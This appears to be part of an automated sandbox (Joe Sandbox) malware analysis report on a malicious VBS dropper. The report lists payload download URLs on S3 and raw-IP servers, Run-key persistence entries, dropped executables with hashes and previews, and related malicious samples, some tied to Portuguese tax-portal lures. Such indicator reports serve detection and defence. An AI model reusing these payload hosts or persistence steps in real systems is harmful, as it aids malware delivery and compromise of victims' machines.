                                                                          https://happychristmaslegado.s3.eu-north-1.amazonaws.com/artigo.exe, 00000005.00000002.2970291807.0000020EFAC1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://heapanalytics.com/js/ved.csswscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferencia.cdrIVE=Cwscript.exe, 00000000.00000003.1803487559.0000022321A63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4Yartigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferewscript.exe, wscript.exe, 00000000.00000003.1830358182.000002232986E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1831533016.000002232986E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://s3.timeweb.com/41907bc4-chronocromdocrom/one/cnf.txtplace.exe, 00000008.00000000.2060052919.0000000000BE3000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                              		high
                                                                              https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4bifartigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://heapanalytics.com/css/ved.csswscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://185.178.46.42/vo/place.exe, 00000008.00000000.2060052919.0000000000BE3000.00000002.00000001.01000000.0000000D.sdmp, place.exe, 00000008.00000002.2972396912.000001477F56A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://185.178.46.42/vo/Uplace.exe, 00000008.00000002.2967068820.00000002F938A000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardcwscript.exe, 00000000.00000003.1684071613.0000022321D2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://heapanalytics.comwscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      16.12.9.46
                                                                                      		unknownUnited States
                                                                                      		unknownunknowntrue
                                                                                      92.53.116.138
                                                                                      		s3.timeweb.comRussian Federation
                                                                                      		9123TIMEWEB-ASRUfalse
                                                                                      94.241.141.101
                                                                                      		unknownIran (ISLAMIC Republic Of)
                                                                                      		39650ATRINCOMMUNICATIONIRfalse
                                                                                      16.12.9.14
                                                                                      		s3-r-w.eu-north-1.amazonaws.comUnited States
                                                                                      		unknownunknownfalse
                                                                                      62.28.254.215
                                                                                      		www.acesso.gov.ptPortugal
                                                                                      		15525MEO-EMPRESASPTfalse
                                                                                      62.28.254.212
                                                                                      		www.portaldasfinancas.gov.ptPortugal
                                                                                      		15525MEO-EMPRESASPTfalse
                                                                                      239.255.255.250
                                                                                      		unknownReserved
                                                                                      		unknownunknownfalse
                                                                                      142.250.185.196
                                                                                      		www.google.comUnited States
                                                                                      		15169GOOGLEUSfalse
                                                                                      152.199.21.175
                                                                                      		sni1gl.wpc.rhocdn.netUnited States
                                                                                      		15133EDGECASTUSfalse

                                                                                      Private

                                                                                      IP
                                                                                      192.168.2.16
                                                                                      192.168.2.4

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1555843
                                                                                      Start date and time:2024-11-14 14:58:54 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 8m 9s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:15
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:guia_luqf.vbs
                                                                                      Detection:MAL
                                                                                      Classification:mal88.evad.winVBS@26/72@18/11
                                                                                      EGA Information:Failed
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      • Number of executed functions: 0
                                                                                      • Number of non-executed functions: 1
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .vbs

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.186.78, 66.102.1.84, 34.104.35.123, 142.250.186.170, 142.250.186.106, 172.217.16.202, 142.250.185.202, 142.250.185.138, 142.250.185.234, 142.250.185.170, 142.250.181.234, 142.250.184.234, 142.250.184.202, 216.58.206.42, 142.250.185.74, 142.250.185.106, 172.217.18.10, 172.217.16.138, 142.250.186.42, 2.22.50.131, 192.229.221.95, 142.250.186.163, 142.250.185.78
                                                                                      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, staticpf.azureedge.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, staticpf.ec.azureedge.net, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                      • Execution Graph export aborted for target lspcv2.exe, PID 3220 because there are no executed function
                                                                                      • Execution Graph export aborted for target lspcv2.exe, PID 7912 because there are no executed function
                                                                                      • Execution Graph export aborted for target place.exe, PID 5316 because there are no executed function
                                                                                      • Execution Graph export aborted for target place.exe, PID 7544 because there are no executed function
                                                                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: guia_luqf.vbs

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      09:00:12API Interceptor2x Sleep call for process: artigo.exe modified
                                                                                      09:00:26API Interceptor3x Sleep call for process: place.exe modified
                                                                                      09:00:36API Interceptor3482x Sleep call for process: lspcv2.exe modified
                                                                                      14:00:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Iplace c:\Intrumental\place.exe
                                                                                      14:00:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LSP c:\Intrumental\lspcv2.exe
                                                                                      14:00:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Iplace c:\Intrumental\place.exe
                                                                                      14:00:55AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LSP c:\Intrumental\lspcv2.exe

                                                                                      LLM Input / Output

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      92.53.116.138guia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                        DividasAtivas_tgj.vbsGet hashmaliciousUnknownBrowse
                                                                                          EBalcao_ysx.vbsGet hashmaliciousUnknownBrowse
                                                                                            phc.exeGet hashmaliciousUnknownBrowse
                                                                                              Simple.exeGet hashmaliciousUnknownBrowse
                                                                                                Stacks.exeGet hashmaliciousUnknownBrowse
                                                                                                  Layer.exeGet hashmaliciousUnknownBrowse
                                                                                                    Cortex.exeGet hashmaliciousUnknownBrowse
                                                                                                      hisense.exeGet hashmaliciousUnknownBrowse
                                                                                                        balcao242609.vbsGet hashmaliciousUnknownBrowse
                                                                                                          94.241.141.101guia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101/teg/publi.php
                                                                                                          DividasAtivas_tgj.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101/teg/publi.php
                                                                                                          EBalcao_ysx.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101/teg/publi.php
                                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101/teg/publi.php
                                                                                                          Simple.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101/dm4/publi.php
                                                                                                          Simple.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101/teg/publi.php
                                                                                                          Stacks.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101/dm4/publi.php
                                                                                                          Stacks.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101/teg/publi.php
                                                                                                          Layer.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101/dm4/publi.php
                                                                                                          Layer.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101/teg/publi.php

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          s3.timeweb.comguia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          DividasAtivas_tgj.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          EBalcao_ysx.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          Simple.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          Stacks.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          Layer.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          Cortex.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          hisense.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          balcao242609.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          s3-r-w.eu-north-1.amazonaws.comguia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 3.5.217.53
                                                                                                          https://send-space.s3.eu-north-1.amazonaws.com/de.htmlGet hashmaliciousUnknownBrowse
                                                                                                          • 3.5.216.59
                                                                                                          https://alaskan.s3.eu-north-1.amazonaws.com/muna.html?login=abc@everbridge.com&pcnt=3&no_redrct=no_redrct&request_type=cancel_requestGet hashmaliciousUnknownBrowse
                                                                                                          • 3.5.216.85
                                                                                                          DividasAtivas_tgj.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 52.95.169.76
                                                                                                          EBalcao_ysx.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 3.5.217.55
                                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 3.5.217.70
                                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 52.95.170.48
                                                                                                          Stacks.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 52.95.169.72
                                                                                                          Stacks.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 3.5.217.55
                                                                                                          Cortex.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 3.5.217.63
                                                                                                          www.portaldasfinancas.gov.ptguia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          DividasAtivas_tgj.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          EBalcao_ysx.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          balcao242609.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          tributario_fdo.zipGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          AUDICAOTRIBUTARIA (21).vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          PDFs.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          https://cld.pt/dl/download/9b3f4f9b-57fd-4108-b138-307803b2a847/sapotransfer-5d9daf99a534a0i/FinancasDividas.html?download=trueGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          Divergencias.exeGet hashmaliciousMaxtrilhaBrowse
                                                                                                          • 62.28.254.212
                                                                                                          Divergencias.exeGet hashmaliciousMaxtrilhaBrowse
                                                                                                          • 62.28.254.212

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          TIMEWEB-ASRUguia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 185.178.47.86
                                                                                                          CPYEzG7VGh.exeGet hashmaliciousDCRatBrowse
                                                                                                          • 185.114.245.123
                                                                                                          DividasAtivas_tgj.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          QYP0tD7z0c.exeGet hashmaliciousDCRatBrowse
                                                                                                          • 92.53.106.114
                                                                                                          EBalcao_ysx.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                                          • 92.53.106.114
                                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          Simple.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          Stacks.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          MEO-EMPRESASPTguia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          DividasAtivas_tgj.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.233.1
                                                                                                          EBalcao_ysx.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          5tSAlF2WkT.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 83.240.195.237
                                                                                                          ai3eCONS9Q.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 62.28.37.203
                                                                                                          M3Llib2vh3.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 62.28.37.203
                                                                                                          IlyNpnwGBF.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 62.28.37.224
                                                                                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 83.240.195.223
                                                                                                          mips.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 83.240.195.245
                                                                                                          ATRINCOMMUNICATIONIRguia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          DividasAtivas_tgj.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          EBalcao_ysx.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          Simple.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          Simple.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          Stacks.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          Stacks.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          Layer.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          Layer.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          28a2c9bd18a11de089ef85a160da29e4INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://google-databricks.com/?uniq_id=b92ZeoMGet hashmaliciousUnknownBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://www.patrimoine-commerce.com/Get hashmaliciousUnknownBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://forms.office.com/Pages/ShareFormPage.aspx?id=xW69F1aTs06UvACEsnZeONWs3ov4-fZJk9ZDjpIIN5tUMUFMSUpJVVFUWEtHTFlURVNUWE1QV1hXQi4u&sharetoken=2Z2A4vYPJAA4bBGx5zDgGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://embeds.beehiiv.com/64a15014-2eab-4da5-b4be-84e59873fb46Get hashmaliciousUnknownBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://securedvoicemailcallalerts.invoclegal.com/TFjjC?e=vendormasterap@saic.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          Draft_Order_Form_6335_pdf_nsg.pdfGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://forms.office.com/Pages/ShareFormPage.aspx?id=xW69F1aTs06UvACEsnZeONWs3ov4-fZJk9ZDjpIIN5tUMUFMSUpJVVFUWEtHTFlURVNUWE1QV1hXQi4u&sharetoken=2Z2A4vYPJAA4bBGx5zDgGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://www.anwesso.com/link.php?link=3D78_02_04_79_88_2B016-4C-01-3D9662EEC8D094AFED274D8E17627986-06D38F7B48CB30B897Get hashmaliciousUnknownBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://www.softwareaktion.com/kostenloser-vergleichGet hashmaliciousUnknownBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          37f463bf4616ecd445d4a1937da06e19Company Profile_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          u06cfykCat.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          4p8aK00tUr.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          aC5NsSYmN0.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          RFQ for WIKA_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          Company Profile_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          SOfQumBuFd.exeGet hashmaliciousBinder HackTool, Stealc, VidarBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          nvxdbat.dll.dllGet hashmaliciousLatrodectusBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          guia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          Company Profile_pdf.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14

                                                                                                          Dropped Files

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          C:\Intrumental\lspcv2.exeguia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                            C:\Intrumental\place.exeguia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                              C:\Users\Public\Termos\artigo.exeguia_evfs.vbsGet hashmaliciousUnknownBrowse

                                                                                                                Created / dropped Files

                                                                                                                C:\Intrumental\lspcv2.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\Termos\artigo.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32891509
                                                                                                                Entropy (8bit):6.984510229105189
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:786432:dGN9uNwx0JaNeQ37X6e7Wmv/T3JILcyoGMYRV+Aal4VqTbWvqeifLAdUpO/7Ajka:0uNmQQLX6e7Wmv/T3JILcyoGMYRV+AaR
                                                                                                                MD5:2047B6AC02B7C454F61D7E90EE1608FE
                                                                                                                SHA1:B1B2B9321AC1BB01FF0DC667D01C136B14AC8448
                                                                                                                SHA-256:FC8EF9246E4D3804573FA486B0C29CE6F795CA06CFCA36B61F2248E9A4C5FF7A
                                                                                                                SHA-512:D6F67A5BEF88F325A80436AD507893302BE5E2C15D130AF2D49B87509F4074EAEE83B4318175DA61FDF1A98A37A8BFCDD071389C3C82F2D69285CFA901B2CD59
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: guia_evfs.vbs, Detection: malicious, Browse
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....4g..........".......H.u\......0.G.......@..............................@............`..........@............... ................P.q....`P.vH...`X......`T...............Q..]....+.......................P.(...................8rP.......P......................text...X.H.......H................. ..`.data.........H.......H.............@....bss....H.....O..........................idata..vH...`P..J...\O.............@....didata.......P.......O.............@....edata..q.....P.......O.............@..@.tls..........P..........................rdata..m.....P.......O.............@..@.reloc...]....Q..^....O.............@..B.pdata.......`T.......S.............@..@.rsrc........`X.......W.............@..@.debug..u,....+.u,....).............@..@

                                                                                                                C:\Intrumental\place.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\Termos\artigo.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):19375329
                                                                                                                Entropy (8bit):5.784574984483087
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:393216:DYmHv3sV7zW8tZAxQlmbRpi6GbyUjA1eHOI1izeYgHdSu2Je4QG0a1SaNWoRvahP:cmHv3sV7zW8tZAxQlmbRpi6GbyUjA1e7
                                                                                                                MD5:971CB0CF2672A22241854896998DDE20
                                                                                                                SHA1:F3C6338B7319C20FB56FA471202B631364BE81F1
                                                                                                                SHA-256:7036468E471E0432E12A7736867FC03ED3A7283877296E7ECFC7B8C2CF91F258
                                                                                                                SHA-512:EC2943865B2C6769962001375AF3FFBCEAE56A9A12F2D98771D4AFB4C03B2275BA37304C801F337450C528D6F3C1D9254DC5830CFE6230A4A06C45585A5DCF62
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: guia_evfs.vbs, Detection: malicious, Browse
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....}4g..........".......H...........G.......@...............................(...........`..........@............... ................Q.q.....P.vH....X.......T..............@Q.p^....\......................0Q.(...................8.P.......P......................text.....H.......H................. ..`.data...8.....H.......H.............@....bss..........O..........................idata..vH....P..J....O.............@....didata.......P.......O.............@....edata..q.....Q.......P.............@..@.tls......... Q..........................rdata..m....0Q.......P.............@..@.reloc..p^...@Q..`....P.............@..B.pdata........T......pS.............@..@.rsrc.........X......fW.............@..@.debug...f....\..f...>[.............@..@

                                                                                                                C:\Users\Public\Termos.zip

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                Category:dropped
                                                                                                                Size (bytes):18292220
                                                                                                                Entropy (8bit):7.998857421458994
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:393216:d68zAibFiPbPSmQahTBmraKohh6fg0J1cx7FqzL09SiDb6l7:cwxbFiPbqmQahTEr1oh06Jqn095b6l7
                                                                                                                MD5:9029E36BDCE303D81F2BBD1869A8E147
                                                                                                                SHA1:D8D715FB21DEFDA4D56A363C97423D481F8F3C93
                                                                                                                SHA-256:184F6393E1222558122593F4DB0CF03D45F6D99A1D7E39EE7994A2B9AFEF7018
                                                                                                                SHA-512:25669F81CE3DFADF77B2017633C79525F7958EE18F052CB83A6B8650FFFD0B097973082A416786114A34269CA1A35239B8CDBEC94F7799BBFD9AD0BC73D5A0DB
                                                                                                                Malicious:true
                                                                                                                Preview:PK........wWmY.............. .Termos/UT.....4g..4gk.4gux.............PK.........WmY.............. .Termos/artigo.exeUT....4g..4g..4gux..............}.xTE...-.l....n4.c..`..!...6t J.A...n...;... ..r..Fgy...1.8..{3.......(I.%.{..8A.7...G....N.K/aQ...GnU.S..9u...u..{*.=.0F.e.Q...H?.s5s..a.X....-...t.7.wvV.nh...6............^....T..Z.64...>.v.....0..g2.tL_%..270.z3...<v..:R8r..X0a..0..K.uR...t.L..35.RM.[U.H...y...K.n.21.a..b..;..A.p.S.....t.d....$...V.P....D.T....... .,....k....j!]........x^..........u..O_.3./4.A"Hd.....%...%D..2..x.%.sK..A...K..lS}...6....W...T..2........o........W2u.D..).-.4<....^...3h..-...W......+... ........l.@....Fwm..I.P.i^mc..X...S.?..s.E..(To.7.4.....:QF..SC.iF...E....m.p.y..f....c...f..6.......z...C2<.@.Un/.*A......|.X../[./m..'.g....Zo}CSm.I.F....G.V47..^.".PC....7s.,uT.mV..*.Ti.......S<c..U.n......h........_./k.....Q.!..X.v.A..2R.S..z.Mu...,...2H?-.y.y..F.G.U..P(..._./m.w#.Z.o.p....mO.....1.]J=.7....m.X.A....i..S.F.X..Q.p

                                                                                                                C:\Users\Public\Termos\artigo.exe

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):30932098
                                                                                                                Entropy (8bit):7.035895727775689
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:786432:iN9uNwx0JaNeQ36RIBiO+j31XoGJnu7ohvtzk+ULOuMsnMOinoEfi28VXQUUbFJu:2uNmQQqRIBiO+j31XoGJnu7ohvtzk+UB
                                                                                                                MD5:31DF1F6E455D2A740E1A90E413F9DB68
                                                                                                                SHA1:F22E1D673D1FB90FE0792A168F02FDB0E5B97916
                                                                                                                SHA-256:648BDF024A96BEEEBCC3D1936755753D984D787F8354A7B45DB8FFF3700DC02D
                                                                                                                SHA-512:21837DCA413A5A7C1D6F76B76470A57DEFD5DC30E1E37086F1B46E3D28F3A72D03263F8D1F86183BDEC7A965FF7A6BB7118B83BEF5C9DF207F0CC77C12E8ED34
                                                                                                                Malicious:true
                                                                                                                Antivirus:
